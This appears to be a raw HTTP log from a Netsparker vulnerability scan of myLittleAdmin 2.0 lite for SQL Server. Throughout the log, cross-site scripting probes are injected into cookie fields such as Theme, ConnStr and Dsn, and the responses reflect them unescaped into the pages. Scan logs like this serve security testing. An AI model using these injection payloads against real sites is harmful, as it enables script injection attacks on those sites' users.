<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00046A%29%3C%2Fscript%3E; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=IKHDKDPDABPMECOBFKBBJAGC
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:48:51 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:48:51 GMT
Content-Length: 1620


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=3;Address=3,'"--></style></script><script>netsparker(0x00046A)</script>;Network =3;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/pref/default.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/theme.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=MaxDisplayedChar=40&MaxDisplayedBin=16&ShowSysProcedure=False&ShowSysFunction=False&PageSize=20&ShowSysTable=False&RowDelimiter=%3B&FirstDayOfWeek=1&Theme=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0005B3%29%3C%2Fscript%3E&Lng=&ShowSysDatabase=False&ShowSysView=False; ConnStr=User=%27%3E%3Cnet+sparker%3Dnetsparker%280x0004DE%29%3E&Networklibrary=3&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=PKHDKDPDFHAAPLEPIAECFPPO
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:50:40 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:50:39 GMT
Content-Length: 1140


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/'"--></style></script><script>netsparker(0x0005B3)</script>/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../pref/default.asp">Preferences</A></P>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=4>Preferences</TD></TR>
<TR><TD>
Choose between<BR>
<UL>
<LI><A CLASS="contentLink" HREF="theme.asp">Skin</A></LI><LI><A CLASS="contentLink" HREF="language.asp">Language</A></LI><LI><A CLASS="contentLink" HREF="display.asp">Display</A></LI>
</UL>
</TD></TR>
</TABLE>



<P>&nbsp;</P>
<H2>Please wait while the tree is loading...</H2>


<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--

if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";

//-->
</SCRIPT>

</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=%22%3E%3Cnet+sparker%3Dnetsparker%280x0003EE%29%3E; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GGHDKDPDJGDBNDNCELJMJFEF
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:11 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:10 GMT
Content-Length: 1612


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=3;Address=3,3;Network =3;Database="><net sparker=netsparker(0x0003EE)>;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000410%29%3C%2Fscript%3E; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:55 GMT
Content-Length: 1570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn='"--></style></script><script>netsparker(0x000410)</script>;uid=3;pwd=3
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:55 GMT
Content-Length: 1570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn='"--></style></script><script>netsparker(0x000410)</script>;uid=3;pwd=3
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/pref/default.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/theme.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
